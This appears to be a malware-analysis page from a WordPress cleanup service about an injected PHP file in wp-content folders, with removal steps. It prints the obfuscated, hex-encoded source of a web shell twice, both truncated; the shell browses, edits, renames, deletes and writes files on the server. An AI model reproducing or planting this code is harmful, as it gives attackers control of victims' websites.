Critical Malware 👻 Fully Undetected (0/61)

Malicious PHP Code Injection in WordPress Directories

Case ID: 8055ab461149df37289d3ebcbf720c123a4a0a94dafb707530ba52b1b1388a2e • Detected: 2026-02-05

Impact Radius
/wp-content, /wp-content/themes/wk, /wp-content/plugins/wk, /wp-content/uploads, /wp-content/mu-plugin
Removal Difficulty
Medium
Recurrence Rate
High
Key Symptom
An XOR encryption function was used to obfuscate the payload, which is typical in malicious scripts to evade detection. The use of base64 encoding further masks the underlying operations.

Evidence Screenshots

Malware Evidence Malware Evidence Malware Evidence Malware Evidence Malware Evidence Malware Evidence

Technical Analysis

I discovered malware in multiple folders within the wp-content directory of a WordPress site. The affected directories include:

  • wp-content/themes/wk
  • wp-content/plugins/wk
  • wp-content/
  • wp-content/uploads
  • wp-content/mu-plugins

The malware also modified directory permissions to 555, preventing modifications.

Code Analysis

The injected code was found in a file named index.php with the following details:

<?php
class nigwqgqwtqwtqwt{
	public function nigwqgqwtqwtqwti(){
		$list = "73657373|696F|6E5F73|746172|7428|293B|68656164|65722822|582D58|53532D|50726F|74656374|69|6F6E|3A|20302229|3B6F62|5F7374|617274|28293B73|65|745F|7469|6D65|5F6C69|6D69|74283029|3B657272|6F725F|7265|706F72|7469|6E6728|30293B|69|6E695F73|657428|2764|697370|6C6179|5F657272|6F|727327|2C20|4641|4C5345|293B|0A2469|73416A61|78203D20|69|7373|65|7428|245F|5345|5256|45|525B2748|54|54|505F|58|5F5245|51|5545|535445|445F|5749|544827|5D2920|0A2020|2020|20|202020|20|26262073|7472|746F6C6F|776572|2824|5F|5345|5256|45525B|2748|5454|505F|585F5245|51554553|5445445F|57495448|275D2920|3D3D|3D2027|786D|6C687474|707265|7175|65737427|3B|0A|0A66756E|637469|6F6E2068|657828|246E|29207B|0A20|202020|24793D|27273B|0A|20|20202066|6F7220|2824|693D|303B20|2469203C|2073|74|726C65|6E2824|6E|293B2024|69|2B|2B|297B0A20|20|2020|20202020|2479|202E3D|20646563|686578|28|6F72|64|2824|6E|5B|24695D29|293B0A|20202020|7D0A2020|20|20726574|75726E20|24793B|0A7D0A66|75|6E637469|6F6E|207568|65|7828|24|79|2920|7B|0A2020|20|20246E3D|2727|3B|0A202020|20|666F7220|282469|3D303B|2024|69203C20|73|74|72|6C|656E|28247929|2D31|3B20|24|692B3D|32297B|0A202020|202020|2020246E|20|2E3D|20636872|28686578|64656328|24|795B24|695D2E24|795B|24|69|2B31|5D2929|3B0A|202020|207D0A|202020|20|726574|75726E|20246E3B|0A7D|0A|696620|286973|73|65742824|5F4745|545B22|64225D|2929207B|0A2020|20202464|20|3D|2075|68|6578|28245F|47|45545B|2264|225D293B|0A202020|20|6966|2028|69|735F|64|69722824|642929|207B0A|2020|20202020|20|2063|68646972|28246429|3B0A2020|20|207D|20656C|7365|207B0A|202020|20202020|20|246420|3D206765|7463|77642829|3B0A2020|20207D|0A|7D|20656C|736520|7B0A2020|20|2024|6420|3D206765|7463|776428|293B0A7D|0A66756E|63|7469|6F6E|20736574|466C61|73|682824|7374|617475|73|2C20|24|6D736729|207B|0A202020|20245F53|45535349|4F4E5B|27|73746174|75|73275D|203D|20247374|617475|733B0A|20202020|24|5F5345|5353494F|4E|5B276D|73|6727|5D203D20|246D|73|67|3B0A|7D0A6966|20|286973|73|65|742824|5F|4745|54|5B27|616A6178|275D|29|2026|2620245F|4745545B|2761|6A61|7827|5D|203D3D|203129|207B0A20|2020203F|3E0A2020|20203C74|6162|6C653E0A|20|202020|202020|203C|74686561|643E0A20|202020|202020|20202020|203C74|723E|0A|2020|202020|20202020|20|20202020|20203C74|683E4E61|6D65|3C|2F74683E|0A20|202020|202020|2020|20202020|20|20203C|74683E53|69|7A653C|2F74|68|3E0A20|2020|20202020|2020|20202020|2020|20|3C7468|3E416374|696F6E|733C2F74|683E|0A20|2020|2020|20|202020|202020|3C2F|7472|3E0A2020|20202020|2020|3C|2F|74686561|64|3E|0A20|202020|202020|203C7462|6F64|793E0A|2020|20|20|20202020|3C3F70|68700A20|202020|20|2020|2024656E|74|7269|65|7320|3D20|736361|6E646972|28246429|3B0A|20|20202020|2020|20246469|72|4C|6973|7420|3D|205B5D3B|0A20|202020|20|20202024|66|696C654C|69737420|3D205B5D|3B0A2020|202020|20202066|6F|7265|616368|20|282465|6E747269|65|73206173|2024656E|747279|29207B0A|20|202020|20|20|20|202020|2020|696620|282465|6E747279|203D|3D2027|2E27|207C7C|202465|6E74|7279|203D|3D2027|2E2E2729|2063|6F6E|7469|6E75653B|0A20|202020|20|2020|2020|20202024|70617468|203D|2024|64|202E20|444952|4543544F|52595F|53|455041|524154|4F5220|2E2024|656E74|72793B0A|2020|2020|2020|20|202020|2020|696620|28|69735F64|69|722824|706174|682929|207B|0A20|20|20|202020|202020|202020|20202020|246469|724C6973|745B|5D203D20|24656E|7472793B|0A|20202020|20202020|20202020|7D|20656C73|6520|7B0A2020|202020|20202020|20|20202020|2020|246669|6C654C69|73|74|5B|5D20|3D|20|24656E|747279|3B0A2020|20202020|20|20202020|207D0A|20202020|2020|20|20|7D0A2020|202020|20202066|6F|7265|616368|20|28246469|72|4C|69737420|61732024|656E7472|792920|7B|0A|20202020|20202020|202020|20247061|74|68203D|202464|202E2044|4952|4543544F|5259|5F53|4550|41|52|41|544F|52202E20|24656E74|72793B0A|202020|20202020|20202020|2065|63686F|20273C74|723E27|3B|0A20|20|2020|20|20|2020|20202020|6563686F|2027|3C|74|643E3C|612063|6C|61|73|733D22|616A61|7844|697222|20687265|663D223F|643D27|20|2E2068|6578|2824|706174|6829202E|2027|223E|27202E20|68746D6C|737065|636961|6C63|686172|732824|656E74|72792920|2E20273C|2F613E3C|2F|7464|3E27|3B0A20|2020|20202020|20|2020|202065|63686F|20273C74|643E|2D|3C|2F74|64|3E273B|0A202020|202020|20202020|20|20656368|6F|20273C74|643E3C2F|74643E|273B0A20|20202020|2020|20|20202020|656368|6F|20273C2F|74723E27|3B0A20|202020|2020|20|207D0A|2020|2020|20|20202066|6F7|6561|6368|20|2824|66696C|65|4C697374|206173|202465|6E|7472|7929207B|0A202020|20|20|20202020|20|20|20247061|746820|3D2024|64202E20|4449|52454354|4F52595F|5345|5041|524154|4F|52|202E2024|656E74|72|793B0A|2020|2020|202020|20|202020|206563|686F20|273C7472|3E273B|0A202020|202020|20202020|2020|65|6368|6F20273C|74|643E|27202E20|68746D6C|737065|63|69616C63|68|61|7273|28|24|656E74|7279|29202E20|273C2F74|643E27|3B0A|20202020|2020|20|2020|202020|6563|686F2027|3C74643E|27|202E|202869|735F66|696C65|2824|70617468|2920|3F2066|696C65|7369|7A|65282470|617468|2920|2E|20272062|797465|732720|3A20272D|27|29|20|2E20273C|2F|74643E27|3B0A|20202020|202020|202020|20|20656368|6F|20273C|74643E27|3B|0A20|2020|20|2020|2020|2020|20|206563|686F2027|3C6120|636C|61|73733D22|616A61|7845|6469|74|2220|68726566|3D22|3F616374|69|6F6E3D65|646974|2664|3D27|202E20|68657828|24|642920|2E|20|2726|6669|6C653D|27|202E|207572|6C656E63|6F|64|65|2824656E|74|72792920|2E20|27|223E45|646974|3C2F613E|207C2027|3B0A|202020|20|202020|20|20202020|20|20206563|686F20|273C|612063|6C|61|73733D22|616A61|78|5265|6E616D|652220|68726566|3D223F61|6374696F|6E3D72|65|6E616D|65|26643D27|20|2E|20|68|657828|24642920|2E202726|66|696C653D|27|202E20|75726C656E|636F|64|6528|24|656E|74|7279|29202E|2027|223E5265|6E616D|653C|2F613E|20|7C|20273B|0A2020|20|20|2020|202020|20|2020|6563686F|2027|3C612063|6C617373|3D|22616A|61784465|6C657465|2220|6872|65663D22|3F616374|696F6E3D|64|656C|65|7465|26643D27|20|2E20|68657828|24|642920|2E|20|2726|66|696C653D|27|202E2075|726C656E|636F|64|652824|65|6E747279|2920|2E202722|3E|44|656C|65|74|653C|2F613E|273B|0A20|20202020|20|20|202020|2020|65636F|20273C2F|74723E27|3B0A2020|20202020|20207D0A|20|2020|2020|2020|2020|203F3E|0A|20202020|20202020|3C2F|74|626F6479|3E0A|20|20|20203C|2F74|61|626C|65|3E|0A2020|20203C|3F7068|700A2020|20|20657869|743B0A7D|0A|0A|69662028|69|73|73657428|245F504F|5354|5B2762|656E6B|79|6F27|5D292026|2620|69737365|742824|5F|504F53|545B27|6461|6B|656A61|275D29|29207B0A|202020|2024|66696C65|4E|616D6520|3D|20245F|504F|53|545B2762|65|6E6B|796F|275D3B0A|20202020|24656E|63|6F64|65|64436F6E|74|656E74|203D20|24|5F|504F53|545B2764|616B|656A61|275D3B|0A202020|20246465|636F6465|64436F6E|74656E|7420|3D20|68657832|62696E|2824656E|636F|646564|436F6E|74|656E7429|3B0A0A20|2020|20696620|282464|65636F64|65|64436F|6E|7465|6E74|20|3D3D|3D2066|616C7365|2920|7B0A20|20|20202020|20206966|202824|697341|6A617829|20|7B0A|20202020|20|2020|20202020|20|68656164|6572|28|27436F6E|74|656E74|2D54|7970653A|20|6170706C|696361|74|69|6F|6E2F|6A736F|6E27|293B0A|20|20202020|20|2020|202020|206563|686F|20|6A73|6F6E5F|65|6E|636F64|65285B27|737461|747573|27|203D3E|202766|6169|6C6564|272C2027|6D7367|27203D3E|2027496E|76616C69|64|20426173|653634|20656E|636F64|696E|67|275D|293B|0A20|20|20202020|20|207D|2065|6C|7365207B|0A2020|20|20202020|2020|20|202073|657446|6C61|7368|28|27666169|6C|656427|2C2027|496E76|616C|69642042|6173|65|3634|20656E63|6F|64|696E|67|2729|3B|0A|2020|20|2020|20|2020|

> **VirusTotal Analysis:** 🛡️ **Zero-Day / Fully Undetected.**

## Attack Chain


## Code Signature(s)

### FILE: `index.php`
```txt
<?php
class nigwqgqwtqwtqwt{
public function nigwqgqwtqwtqwti(){
$list = "73657373|696F|6E5F73|746172|7428|293B|68656164|65722822|582D58|53532D|50726F|74656374|69|6F6E|3A|20302229|3B6F62|5F7374|617274|28293B73|65|745F|7469|6D65|5F6C69|6D69|74283029|3B657272|6F725F|7265|706F72|7469|6E6728|30293B|69|6E695F73|657428|2764|697370|6C6179|5F657272|6F|727327|2C20|4641|4C5345|293B|0A2469|73416A61|78203D20|69|7373|65|7428|245F|5345|5256|45|525B2748|54|54|505F|58|5F5245|51|5545|535445|445F|5749|544827|5D2920|0A2020|2020|20|202020|20|26262073|7472|746F6C6F|776572|2824|5F|5345|5256|45525B|2748|5454|505F|585F5245|51554553|5445445F|57495448|275D2920|3D3D|3D2027|786D|6C687474|707265|7175|65737427|3B|0A|0A66756E|637469|6F6E2068|657828|246E|29207B|0A20|202020|24793D|27273B|0A|20|20202066|6F7220|2824|693D|303B20|2469203C|2073|74|726C65|6E2824|6E|293B2024|69|2B|2B|297B0A20|20|2020|20202020|2479|202E3D|20646563|686578|28|6F72|64|2824|6E|5B|24695D29|293B0A|20202020|7D0A2020|20|20726574|75726E20|24793B|0A7D0A66|75|6E637469|6F6E|207568|65|7828|24|79|2920|7B|0A2020|20|20246E3D|2727|3B|0A202020|20|666F7220|282469|3D303B|2024|69203C20|73|74|72|6C|656E|28247929|2D31|3B20|24|692B3D|32297B|0A202020|202020|2020246E|20|2E3D|20636872|28686578|64656328|24|795B24|695D2E24|795B|24|69|2B31|5D2929|3B0A|202020|207D0A|202020|20|726574|75726E|20246E3B|0A7D|0A|696620|286973|73|65742824|5F4745|545B22|64225D|2929207B|0A2020|20202464|20|3D|2075|68|6578|28245F|47|45545B|2264|225D293B|0A202020|20|6966|2028|69|735F|64|69722824|642929|207B0A|2020|20202020|20|2063|68646972|28246429|3B0A2020|20|207D|20656C|7365|207B0A|202020|20202020|20|246420|3D206765|7463|77642829|3B0A2020|20207D|0A|7D|20656C|736520|7B0A2020|20|2024|6420|3D206765|7463|776428|293B0A7D|0A66756E|63|7469|6F6E|20736574|466C61|73|682824|7374|617475|73|2C20|24|6D736729|207B|0A202020|20245F53|45535349|4F4E5B|27|73746174|75|73275D|203D|20247374|617475|733B0A|20202020|24|5F5345|5353494F|4E|5B276D|73|6727|5D203D20|246D|73|67|3B0A|7D0A6966|20|286973|73|65|742824|5F|4745|54|5B27|616A6178|275D|29|2026|2620245F|4745545B|2761|6A61|7827|5D|203D3D|203129|207B0A20|2020203F|3E0A2020|20203C74|6162|6C653E0A|20|202020|202020|203C|74686561|643E0A20|202020|202020|20202020|203C74|723E|0A|2020|202020|20202020|20|20202020|20203C74|683E4E61|6D65|3C|2F74683E|0A20|202020|202020|2020|20202020|20|20203C|74683E53|69|7A653C|2F74|68|3E0A20|2020|20202020|2020|20202020|2020|20|3C7468|3E416374|696F6E|733C2F74|683E|0A20|2020|2020|20|202020|202020|3C2F|7472|3E0A2020|20202020|2020|3C|2F|74686561|64|3E|0A20|202020|202020|203C7462|6F64|793E0A|2020|20|20|20202020|3C3F70|68700A20|202020|20|2020|2024656E|74|72|6965|7320|3D20|736361|6E646972|28246429|3B0A|20|20202020|2020|20246469|72|4C|6973|7420|3D|205B5D3B|0A20|202020|20|20202024|66|696C654C|69737420|3D205B5D|3B0A2020|202020|20202066|6F|72|6561|63682028|24|65|6E|747269|65|73|20617320|24656E|747279|29207B0A|20|202020|20|20|20|202020|2020|696620|282465|6E747279|203D|3D2027|2E27|207C7C|202465|6E74|7279|203D|3D2027|2E2E2729

Indicators of Compromise (IOCs)

Removal Protocol

    1. Remove all malicious files from the following directories: wp-content/themes/wk, wp-content/plugins/wk, wp-content/uploads, wp-content/mu-plugins.
    1. Change the permissions of the affected directories back to 755.
    1. Use a file integrity plugin to verify the WordPress installation and identify any other compromised files.
    1. Update all WordPress plugins, themes, and core files to the latest versions.
    1. Implement appropriate security measures, such as a firewall and malware scanner, to prevent future infections.

Status: Active Threat.
Verification: Verified by MD Pabel.

Need help removing this?

This malware is rated as Medium difficulty. If you are unsure, do not attempt manual removal.

Hire MD Pabel for Cleanup